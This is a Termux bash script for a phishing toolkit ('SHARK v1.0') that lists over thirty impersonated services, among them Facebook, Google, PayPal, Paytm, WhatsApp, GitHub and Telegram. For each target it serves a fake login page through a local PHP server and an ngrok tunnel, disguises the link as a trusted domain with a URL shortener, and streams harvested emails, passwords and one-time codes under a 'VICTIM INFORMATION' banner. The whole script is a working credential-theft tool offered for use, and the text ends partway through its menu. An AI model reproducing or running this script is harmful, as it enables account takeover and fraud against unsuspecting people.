#!/data/data/com.termux/files/usr/bin/bash
clear
echo ""
echo ""
echo -e "\e[32m                ============================================\e[m "
echo -e "\e[31m                [\e[32m★\e[31m]\e[93m Follow us on youtube:bhaviktutorials\e[31m [\e[32m★\e[31m]\e[m "
echo -e "\e[32m                ============================================\e[m "
echo 
echo 
echo -e "\e[31m[\e[32m★\e[31m]\e[32m ENABLE YOUR MOBILE DATA & HOTSPOT TO CONTINUE\e[m "
sleep 1
echo ""
echo " "
echo -en "\e[31m[\e[32m*\e[31m]\e[32m Do You Have Enable it (y/n)? \e[m "
read ans
if [ "$ans" != "${ans#[Yy]}" ]; then
echo 
echo 
echo -e "\e[92m>>>\e[91m Note:\e[96m Do not turn off your hotspot while performing phishing \e[m "
sleep 8
else 
exit
fi

php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok
clear
echo -e "\e[94m   

        ██████╗██╗  ██╗ █████╗ ██████╗ ██╗  ██╗
       ██╔════╝██║  ██║██╔══██╗██╔══██╗██║ ██╔╝
       ╚█████╗ ███████║███████║██████╔╝█████═╝
        ╚═══██╗██╔══██║██╔══██║██╔══██╗██╔═██╗
       ██████╔╝██║  ██║██║  ██║██║  ██║██║ ╚██╗
       ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝ v 1.0\e[m "

echo ""
echo -e $'\e[32m        =======================================         \e[0m'
echo -e $'\e[93m           c r e a t e d  b y  a s h i s h            \e[m '
echo -e $'\e[32m        =======================================           \e[0m '
echo ""
banner(){
echo -e "\e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\e[m "
echo " "
printf "\e[1;31m[\e[0m\e[1;77m01\e[0m\e[1;31m]\e[0m\e[1;32m Facebook\e[0m                \e[1;31m[\e[0m\e[1;77m17\e[0m\e[1;31m]\e[0m\e[1;32m Zomato\e[0m          \e[0m\n"                                                                                     
printf "\e[1;31m[\e[0m\e[1;77m02\e[0m\e[1;31m]\e[0m\e[1;32m Pinterest\e[0m               \e[1;31m[\e[0m\e[1;77m18\e[0m\e[1;31m]\e[0m\e[1;32m PhonePay\e[0m        \e[0m\n"                                                                                                                    
printf "\e[1;31m[\e[0m\e[1;77m03\e[0m\e[1;31m]\e[0m\e[1;32m Instagram\e[0m               \e[1;31m[\e[0m\e[1;77m19\e[0m\e[1;31m]\e[0m\e[1;32m Paypal\e[0m          \e[0m\n"                                                                                           
printf "\e[1;31m[\e[0m\e[1;77m04\e[0m\e[1;31m]\e[0m\e[1;32m Uber Eats\e[0m               \e[1;31m[\e[0m\e[1;77m20\e[0m\e[1;31m]\e[0m\e[1;32m Telegram\e[0m        \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m05\e[0m\e[1;31m]\e[0m\e[1;32m OLA\e[0m                     \e[1;31m[\e[0m\e[1;77m21\e[0m\e[1;31m]\e[0m\e[1;32m Twitter\e[0m         \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m06\e[0m\e[1;31m]\e[0m\e[1;32m Google\e[0m                  \e[1;31m[\e[0m\e[1;77m22\e[0m\e[1;31m]\e[0m\e[1;32m Flipcart\e[0m        \e[0m\n"                                                                                          
printf "\e[1;31m[\e[0m\e[1;77m07\e[0m\e[1;31m]\e[0m\e[1;32m Paytm\e[0m                   \e[1;31m[\e[0m\e[1;77m23\e[0m\e[1;31m]\e[0m\e[1;32m Wordpress\e[0m       \e[0m\n"                                                                                          
printf "\e[1;31m[\e[0m\e[1;77m08\e[0m\e[1;31m]\e[0m\e[1;32m Netflix\e[0m                 \e[1;31m[\e[0m\e[1;77m24\e[0m\e[1;31m]\e[0m\e[1;32m Snapchat\e[0m        \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m09\e[0m\e[1;31m]\e[0m\e[1;32m Instagram-Followers\e[0m     \e[1;31m[\e[0m\e[1;77m25\e[0m\e[1;31m]\e[0m\e[1;32m Protonmail\e[0m      \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m10\e[0m\e[1;31m]\e[0m\e[1;32m Amazon\e[0m                  \e[1;31m[\e[0m\e[1;77m26\e[0m\e[1;31m]\e[0m\e[1;32m Stackoverflow\e[0m   \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m11\e[0m\e[1;31m]\e[0m\e[1;32m WhatsApp\e[0m                \e[1;31m[\e[0m\e[1;77m27\e[0m\e[1;31m]\e[0m\e[1;32m ebay\e[0m            \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m12\e[0m\e[1;31m]\e[0m\e[1;32m Linkedin\e[0m                \e[1;31m[\e[0m\e[1;77m28\e[0m\e[1;31m]\e[0m\e[1;32m Twitch\e[0m          \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m13\e[0m\e[1;31m]\e[0m\e[1;32m Hotstar\e[0m                 \e[1;31m[\e[0m\e[1;77m29\e[0m\e[1;31m]\e[0m\e[1;32m Ajio\e[0m            \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m14\e[0m\e[1;31m]\e[0m\e[1;32m Spotify\e[0m                 \e[1;31m[\e[0m\e[1;77m30\e[0m\e[1;31m]\e[0m\e[1;32m Cryptocurrency\e[0m  \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m15\e[0m\e[1;31m]\e[0m\e[1;32m Github\e[0m                  \e[1;31m[\e[0m\e[1;77m31\e[0m\e[1;31m]\e[0m\e[1;32m Mobikwik\e[0m        \e[0m\n"                                                                                         
printf "\e[1;31m[\e[0m\e[1;77m16\e[0m\e[1;31m]\e[0m\e[1;32m IPFinder\e[0m                \e[1;31m[\e[0m\e[1;77m99\e[0m\e[1;31m]\e[0m\e[1;32m Exit\e[0m            \e[0m\n"    
echo " "
echo -e "\e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\e[m "
}
banner
echo ""
ash() {
	sleep 2
	url_checker() {
	if [ ! "${1//:*}" = http ]; then
	if [ ! "${1//:*}" = https ]; then
	echo -e "\e[31m[!] Invalid URL. Please use http or https.\e[0m"
	exit 1
	fi
	fi
         }

	echo -e "\e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> \e[m "
	echo
        read -p $'\e[31m[\e[32m*\e[31m]\e[32m Paste your above ngrok url here :\e[m ' phish
        url_checker $phish
        short=$(curl -s https://da.gd/s/?url=${phish})
        shorter=${short#https://}
        echo
        read -p $'\e[31m[\e[32m*\e[31m]\e[32m Mask Your url domain here [\e[91mEx. https://facebook.com\e[32m] :\e[m ' mask
        echo
        url_checker $mask
        echo -e "\e[96m>>\e[93m Enter some words you like to mention in url \e[32m[\e[92mEx.free-insta-followers\e[32m] \e[m "
	sleep 1
        echo
	echo -e "\e[96m>>\e[91m NOTE:\e[93m Don't use space in your words,\e[32m[\e[91minstead use \e[32m'-'\e[91m to avoid space\e[32m] \e[m "
	sleep 2
	echo
        read -p $'\e[31m[\e[32m*\e[31m]\e[32m Enter your words here :\e[0m ' words
        echo
	sleep 3
        final=$mask-$words@$shorter
        echo -e "\e[31m[\e[32m*\e[31m]\e[32m Your phishing url >>\e[m $final "
        }

        read -p $'\e[31m[\e[32m*\e[31m]\e[32m Enter Your Choice : \e[0m' option
	case $option in 
	        
	                  1)cd /data/data/com.termux/files/usr/bin/phs
                            cd facebook/
                            echo ""   
			    echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'   
			    php -S 127.0.0.1:4444 > /dev/null 2>&1 &    
			    sleep 2  
			    echo ""
			    echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
			    ./ngrok http 4444 > /dev/null 2>&1 & 
			    sleep 4
			    echo ""
			    link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") 
			    printf "\e[31m[\e[32m*\e[31m]\e[33m Your URL >>\e[0m\e[32m %s\e[0m\n" $link
			    echo ""                                                                                                                           
			    ash 
			    echo " "
			    echo " "
			    sleep 2
			    echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'  
			    echo "" 
			    tail -f log.txt | grep -e "email" -e "pass" -e "approvals_code"
	
                             ;;
			     
			  
			   2)cd /data/data/com.termux/files/usr/bin/phs
                           cd pinterest/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "id" -e "password"      

                            ;;

			  


		         3)cd /data/data/com.termux/files/usr/bin/phs
			   cd instagram/
			   echo ""      
			   echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m' 
			   php -S 127.0.0.1:4444 > /dev/null 2>&1 &  
			   sleep 2
			   echo "" 
			   echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'     
			   ./ngrok http 4444 > /dev/null 2>&1 &
			   sleep 4
			   echo ""
			   link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
			   printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
			   echo "" 
			   ash
			   echo " "
			   echo " "
			   sleep 2
			   echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
			   tail -f log.txt
                           ;;

                        4)cd /data/data/com.termux/files/usr/bin/phs
			  cd UberEats-Phishing/
			  echo " "
			  echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
			  php -S 127.0.0.1:4444 > /dev/null 2>&1 & 
			  sleep 2  
			  echo "" 
			  echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m' 
			  ./ngrok http 4444 > /dev/null 2>&1 &
			  sleep 4   
			  echo " "
			  link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") 
			  printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link  
			  echo ""  
			  ash 
			  echo " "
			  echo " "
			  sleep 2
			  echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
			  tail -f log.txt | grep -e "Email_or_Phone" -e "password" -e "verificationCode"

                          ;;
                 
                        5)cd /data/data/com.termux/files/usr/bin/phs
                          cd ola-otpbypass/
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m' 
		          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		          sleep 2   
		          echo ""
		          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'  
		          ./ngrok http 4444 > /dev/null 2>&1 &
		          sleep 4   
		          echo " "
		          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")  
		          printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
		          echo "" 
		          ash
		          echo " "
			  echo " "
			  sleep 2
		          echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
		          tail -f log.txt | grep -e "number" -e "otp" -e "OTP"

                          ;;
                
                        6)cd /data/data/com.termux/files/usr/bin/phs
                          cd google-otp/
                          echo ""
		          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'    
		          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		          sleep 2
		          echo ""
		          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'   
		          ./ngrok http 4444 > /dev/null 2>&1 &
		          sleep 4
		          echo " "
		          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")        
		          printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
		          echo "" 
		          ash
			  echo " "
		          echo " "
			  sleep 2
		          echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
		          tail -f log.txt | grep -e "email" -e "password" -e "OTP"
  
                          ;;
  
                        7)cd /data/data/com.termux/files/usr/bin/phs
                          cd Paytm-Phishing/
                          echo ""
                          echo -e $'\e[1;33m[\e[0m\e[1;77m 1 \e[0m\e[1;33m]\e[0m\e[1;32m Paytm Sign In \e[0m' 
                          echo -e $'\e[1;33m[\e[0m\e[1;77m 2 \e[0m\e[1;33m]\e[0m\e[1;32m Paytm Sign UP \e[0m' 
                          echo ""
                          read -p $'\e[1;33m[\e[0m\e[1;77m <<>> \e[0m\e[1;33m]\e[0m\e[1;32m Enter Your Choice : \e[0m' option
		          case $option in

			      1)cd paytm/
                                echo ""
                                echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                                php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                                sleep 2
                                echo ""
                                echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                                ./ngrok http 4444 > /dev/null 2>&1 &
                                sleep 4
                                echo ""
                                link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                                printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                                echo ""
			        ash
			        echo " "
			        echo " "
			        sleep 2
                                echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                                echo ""
                                tail -f log.txt | grep -e "email" -e "username" -e "password" -e "otp"

                                ;;
		esac
	                	;;
                
                              2)cd signup/
                                echo ""
                                echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                                php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                                sleep 2
                                echo ""
                                echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                                ./ngrok http 4444 > /dev/null 2>&1 &
                                sleep 2
                                echo ""
                                link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                                printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                                echo ""
			        ash
				echo " "
			        echo " "
				sleep 2
                                echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                                echo ""
                                tail -f log.txt | grep -e "email" -e "loginPassword" -e "mobileNumber" -e "otp"

                                 ;;

                        8)cd /data/data/com.termux/files/usr/bin/phs
                          cd Netflix/
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 2
                          echo ""
                          echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                          ./ngrok http 4444 > /dev/null 2>&1 &
                          sleep 4
                          echo ""
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                          printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                          echo ""
		          ash
		          echo " "
			  echo " "
			  sleep 2
                          echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                          echo ""
                          tail -f log.txt | grep -e "userLoginId" -e "password" -e "OTP"                 

                           ;;


                         9)cd /data/data/com.termux/files/usr/bin/phs
                           cd instafollow/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "username" -e "password" -e "password" -e "pin" -e "Pin"                        

                           ;;

                        10)cd /data/data/com.termux/files/usr/bin/phs
                           cd amazonsign/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "email" -e "password" -e "OTP"  

                           ;;

                        11)cd /data/data/com.termux/files/usr/bin/phs
                           cd whatsapp-phishing/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "number" -e "OTP" -e "otp"      

                           ;;

                        12)cd /data/data/com.termux/files/usr/bin/phs
                           cd Linkedin/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "email" -e "Email" -e "password" -e "pin" -e "Pin"       

                           ;;
   
                        13)cd /data/data/com.termux/files/usr/bin/phs
                           cd Hotstar-otp-bypass/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "phoneNo" -e "OTP"       

                            ;;
      
                        14)cd /data/data/com.termux/files/usr/bin/phs
                           cd spotify/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash 
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "username" -e "password" -e "password" -e "pin" -e "Pin"        

                           ;;

                        15)cd /data/data/com.termux/files/usr/bin/phs
                           cd github/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
	                   ash
		           echo " "
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "login" -e "password" -e "otp"       

                           ;;

                        16)cd /data/data/com.termux/files/usr/bin/phs
                           cd ipfinder/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
             		   ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f ip.txt        

                           ;;

               
                        17)cd /data/data/com.termux/files/usr/bin/phs
                           cd Zomato-Phishing/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
	                   ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "email" -e "otp" -e "OTP"                

                           ;;


                        18)cd /data/data/com.termux/files/usr/bin/phs
                           cd phonepay/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
          		   ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "number" -e "otp"                       

                            ;;

                        19)cd /data/data/com.termux/files/usr/bin/phs
                           cd paypal/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
	                   ash
		           echo " "
			   echo " "
			   sleep 2
                           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "login_email" -e "login_password" -e "otpCode"    

                           ;;

                        20)cd /data/data/com.termux/files/usr/bin/phs
                           cd telegram/
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Starting Phishinhg Attack \e[0m'
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 2
                           echo ""
                           echo -e $'\e[31m[\e[32m*\e[31m]\e[33m Loading server.. \e[0m'
                           ./ngrok http 4444 > /dev/null 2>&1 &
                           sleep 4
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
                           printf "\e[31m[\e[32m*\e[31m]\e[33m Your Phishing link :\e[0m\e[32m %s\e[0m\n" $link
                           echo ""
		           ash
		           echo " "
			   echo " "
			   sleep 2
		           echo -e $'\e[96m<<<<<<<<<<<<<<<<<<<<<<<\e[92m VICTIM INFORMATION \e[96m>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  \e[93m'
                           echo ""
                           tail -f log.txt | grep -e "phone_number" -e "phone_code"     

                           ;;

